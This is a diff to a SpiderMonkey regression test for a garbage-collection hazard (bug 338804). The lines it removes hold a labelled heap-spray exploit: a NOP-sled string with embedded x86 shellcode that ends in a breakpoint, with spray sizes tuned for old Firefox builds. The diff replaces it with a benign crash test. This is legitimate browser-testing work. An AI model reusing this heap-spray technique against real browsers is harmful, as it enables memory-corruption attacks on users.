@@ -35,7 +35,7 @@
  *
  * ***** END LICENSE BLOCK ***** */
 
-var gTestfile = 'regress-338804-02.js';
+var gTestfile = 'regress-338804-03.js';
 //-----------------------------------------------------------------------------
 var BUGNUMBER = 338804;
 var summary = 'GC hazards in constructor functions';
@@ -44,60 +44,19 @@ var expect = 'No Crash';
 
 printBugNumber(BUGNUMBER);
 printStatus (summary);
-printStatus ('Uses Intel Assembly');
 
-// <script>
-// SpiderMonkey Script() GC hazard exploit
-//
-// scale: magic number ;-)
-//  BonEcho/2.0a2: 3000
-//  Firefox/1.5.0.4: 2000
-//
-var rooter, scale = 2000;
-
-exploit();
-/*
-  if(typeof(setTimeout) != "undefined") {
-  setTimeout(exploit, 2000);
-  } else {
-  exploit();
-  }
-*/
-
-function exploit() {
-  if (typeof Script == 'undefined')
-  {
-    print('Test skipped. Script not defined.');
-  }
-  else
-  {
-    Script({ toString: fillHeap });
-    Script({ toString: fillHeap });
-  }
-}
-
-function createPayload() {
-  var result = "\u9090", i;
-  for(i = 0; i < 9; i++) {
-    result += result;
-  }
-  /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
-  result += "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
-  return result;
+if (typeof Script != 'undefined')
+{
+  Script({ toString: fillHeap });
 }
+RegExp({ toString: fillHeap });
 
 function fillHeap() {
-  rooter = [];
-  var payload = createPayload(), block = "", s2 = scale * 2, i;
-  for(i = 0; i < scale; i++) {
-    rooter[i] = block = block + payload;
+  if (typeof gc == 'function') gc();
+  var x = 1, tmp;
+  for (var i = 0; i != 50000; ++i) {
+    tmp = x / 3;
   }
-  for(; i < s2; i++) {
-    rooter[i] = payload + i;
-  }
-  return "";
 }
-
-// </script>
  
 reportCompare(expect, actual, summary);
